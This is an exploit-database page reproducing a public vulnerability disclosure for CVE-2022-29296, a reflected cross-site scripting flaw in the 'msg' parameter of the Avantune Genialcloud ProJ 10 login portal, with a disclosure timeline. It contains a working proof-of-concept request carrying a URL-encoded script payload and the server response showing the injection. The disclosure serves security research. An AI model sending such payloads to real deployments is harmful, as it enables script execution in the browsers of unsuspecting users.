Advertisement






Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)

CVE Category Price Severity
CVE-2022-29296 CWE-79 Unknown High
Author Risk Exploitation Type Date
N/A High Remote 2022-06-01
CPE
cpe:No specific CPE provided for this exploit
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060001

Below is a copy:

Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)
# Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)
# Date: 2022-06-01
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.avantune.com
# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com
# Version: 10
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)
# CVE: CVE-2022-29296


Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the
same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject
and execute arbitrary web scripts or HTML via a crafted payload.

Request parameters affected is "msg".

PoC Request:
GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1
Host: [REDACTED]
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Cache-Control: max-age=0

PoC Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 May 2022 10:51:10 GMT
Connection: close
Content-Length: 8162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="stylesheet"
...[SNIP]...
<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>
...[SNIP]...


Timeline:

2022-01-05: Vulnerability discovered.
2022-01-06: Vendor contacted.
2022-02-07: No reply, vendor contacted for 2nd time.
2022-02-10: Request for CVE reservation.
2022-04-16: Assigned CVE number CVE-2022-29296.
2022-05-07: No reply, vendor contacted for 3rd time.
2022-06-01: Public disclosure.


PoC Screenshots:

https://imagebin.ca/v/6j86ekMqKZD8
https://postimg.cc/XXv6YbK9


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.